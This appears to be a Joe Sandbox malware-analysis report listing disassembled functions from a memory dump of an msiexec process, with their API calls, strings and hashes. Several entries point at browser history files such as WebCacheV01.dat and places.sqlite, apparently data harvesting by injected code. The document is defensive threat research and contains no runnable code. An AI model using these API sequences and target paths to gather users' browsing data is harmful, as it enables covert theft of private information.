                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 4182280571-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
